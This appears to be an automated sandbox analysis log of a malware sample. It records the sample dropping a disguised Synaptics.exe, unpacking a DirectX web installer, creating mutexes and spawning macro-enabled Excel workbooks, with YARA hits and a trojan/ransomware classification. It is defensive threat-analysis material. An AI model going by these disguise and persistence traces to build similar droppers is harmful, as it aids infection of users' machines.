                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45F2EB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45F2EB.tmp\Jun2010_d3dcsx_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_d3dcsx_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45FA8D.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS45FA8D.tmp\Jun2010_D3DCompiler_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2010_D3DCompiler_43_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46029B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46029B.tmp\Feb2005_d3dx9_24_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2005_d3dx9_24_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS460B75.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS460B75.tmp\Apr2005_d3dx9_25_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2005_d3dx9_25_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS461568.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS461568.tmp\Jun2005_d3dx9_26_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2005_d3dx9_26_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS461E41.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS461E41.tmp\Aug2005_d3dx9_27_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2005_d3dx9_27_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS462805.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS462805.tmp\Dec2005_d3dx9_28_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2005_d3dx9_28_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS463227.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS463227.tmp\Feb2006_d3dx9_29_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_d3dx9_29_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS463B2F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS463B2F.tmp\Feb2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4640BD.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4640BD.tmp\Feb2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46467A.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46467A.tmp\Apr2006_d3dx9_30_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_d3dx9_30_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS465000.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS465000.tmp\Apr2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4655FB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4655FB.tmp\Apr2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS465B98.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS465B98.tmp\Jun2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466117.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466117.tmp\Jun2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466702.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466702.tmp\Aug2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466CA0.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS466CA0.tmp\Aug2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Aug2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46728B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46728B.tmp\Oct2006_d3dx9_31_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_d3dx9_31_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS467BE2.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS467BE2.tmp\Oct2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4681BE.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4681BE.tmp\Oct2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Oct2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46876B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46876B.tmp\Dec2006_d3dx9_32_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_d3dx9_32_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46911F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46911F.tmp\Dec2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4696FB.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS4696FB.tmp\Dec2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Dec2006_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS469D26.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS469D26.tmp\Feb2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A2D3.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A2D3.tmp\Feb2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Feb2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A89F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46A89F.tmp\Apr2007_d3dx9_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx9_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B273.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B273.tmp\Apr2007_d3dx10_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_d3dx10_33_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B9B6.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46B9B6.tmp\Apr2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46BF54.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46BF54.tmp\Apr2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Apr2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46C53F.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46C53F.tmp\Jun2007_d3dx9_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx9_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46CF03.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46CF03.tmp\Jun2007_d3dx10_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_d3dx10_34_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46D685.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46D685.tmp\Jun2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_xact_x86.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46DD5B.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46DD5B.tmp\Jun2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\SysWOW64\DirectX\WebSetup\Jun2007_xact_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46E356.tmpJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile created: C:\Windows\msdownld.tmp\AS46E356.tmp\Aug2007_d3dx9_35_x64.cabJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeFile deleted: C:\Windows\SysWOW64\directx\websetup\SETFF3.tmpJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01007E022_2_01007E02
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100791E2_2_0100791E
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_0100878E2_2_0100878E
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010080E22_2_010080E2
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: r4UZcR9I.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                          Source: EOWRVPQCCS.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                          Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCXE9B.tmp 1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: file.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: ._cache_file.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 220645 bytes, 5 files, at 0x2c "dsetup.dll" "dsetup32.dll", ID 5930, number 1, 75 datablocks, 0x1503 compression
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, MS CAB-Installer self-extracting archive
                          Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: RCXE9B.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: dxwsetup.exe.2.drStatic PE information: Resource name: RT_VERSION type: TTComp archive data, binary, 4K dictionary
                          Source: file.exe, 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs file.exe
                          Source: file.exe, 00000000.00000003.2043741217.0000000002490000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: file.exe, 00000000.00000003.2041569981.0000000004641000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe, 00000000.00000003.2043794889.0000000000798000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs file.exe
                          Source: file.exe, 00000000.00000000.2035201683.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exe, 00000000.00000000.2035201683.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exeh$ vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exe` vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exed! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exel% vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedxwsetup.exep( vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dllh$ vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dll` vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dlld! vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dllp' vs file.exe
                          Source: ._cache_file.exe, 00000002.00000003.2043009368.0000000000DDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedsetup32.dllx, vs file.exe
                          Source: file.exeBinary or memory string: OriginalFileName vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameb! vs file.exe
                          Source: ._cache_file.exe.0.drBinary or memory string: OriginalFilenamedxwebsetup.exej% vs file.exe
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engineClassification label: mal74.rans.troj.expl.winEXE@11/258@4/3
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01003F0D lstrcpyA,GetCurrentDirectoryA,SetCurrentDirectoryA,SetCurrentDirectoryA,GetLastError,FormatMessageA,GetVolumeInformationA,GetLastError,FormatMessageA,SetCurrentDirectoryA,SetCurrentDirectoryA,lstrcpynA,2_2_01003F0D
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_010018B5 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,2_2_010018B5
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01005E67 GetDiskFreeSpaceA,SetCurrentDirectoryA,MulDiv,2_2_01005E67
                          Source: C:\Users\user\Desktop\._cache_file.exeCode function: 2_2_01004C18 CreateEventA,SetEvent,CreateMutexA,GetLastError,CloseHandle,FindResourceA,LoadResource,#17,2_2_01004C18
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\Desktop\._cache_file.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DSETUP32 DLL Mutex
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DXWSETUP
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DXUPDATE DLL Mutex
                          Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeMutant created: \Sessions\1\BaseNamedObjects\DSETUP DLL Mutex
                          Source: C:\Users\user\Desktop\._cache_file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: Yara matchFile source: file.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000000.2035117785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE9B.tmp, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\Documents\BJZFPPWAPT\~$cache1, type: DROPPED
                          Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: file.exeReversingLabs: Detection: 92%
                          Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe"
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                          Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\._cache_file.exe "C:\Users\user\Desktop\._cache_file.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                          Source: C:\Users\user\Desktop\._cache_file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exeJump to behavior
                          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
